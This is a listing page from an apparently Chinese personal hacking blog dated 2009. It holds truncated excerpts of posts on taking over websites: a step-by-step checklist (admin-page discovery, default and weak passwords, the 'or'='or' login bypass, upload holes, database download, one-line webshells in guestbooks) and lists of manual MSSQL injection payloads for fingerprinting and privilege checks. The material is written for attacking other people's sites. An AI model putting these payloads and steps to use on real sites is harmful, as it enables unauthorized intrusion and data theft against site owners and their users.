博客_"づ冰雨玄月's Blog

拿站的顺序：（顺序不一定完全正确只当参考）下面有示例教程
1、确定目标（因为只是个思路我就随便找个为了教程的真实性也没有准备）
2、查找后台
3、利用默认密码和弱口令登陆（admin admin888 'or'='or' ……）
也就是得到登陆页面后用上面的几个默认密码进行登陆运气好的话是可以成功的
4、上传漏洞（dv抓包 nc上传）
5、数据库下载（辅臣数据浏览器、数据库助手等）
6、查找注入漏洞
7、留言本插入一句话（比较少）
8、旁注等……

阅读全文>>

类别：脚本入侵|评论(0) |浏览(105)

脚本入侵中可利用的方法

2009年10月24日星期六 16:30

1.上传漏洞[不多讲]
pS: 如果看到:选择你要上传的文件 [重新上传]或者出现“请登陆后使用”，80%就有漏洞了！
有时上传不一定会成功,这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传.

阅读全文>>

类别：脚本入侵|评论(0) |浏览(81)

手工MSSQL注入常用SQL语句

2009年10月24日星期六 16:15

and exists (select * from sysobjects) //判断是否是MSSQL

and exists(select * from tableName) //判断某表是否存在..tableName为表名

and 1=(select @@VERSION) //MSSQL版本

And 1=(select db_name()) //当前数据库名

and 1=(select @@servername) //本地服务名

and 1=(s

阅读全文>>

类别：脚本入侵|评论(0) |浏览(55)

自己构造注入点

2009年10月24日星期六 15:26

一种是通过conn.asp获知数据库帐户密码以后
自己构造，另一个是通过搜索查看源代码构造注入点。

第一种：适用条件:

阅读全文>>

类别：脚本入侵|评论(0) |浏览(81)

我记性不好，所以把常用的注入代码记录下来，有点乱，但对我来说，还算很有用，希望大家也会喜欢！

2009年10月23日星期五 12:02

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型

阅读全文>>

类别：脚本入侵|评论(0) |浏览(62)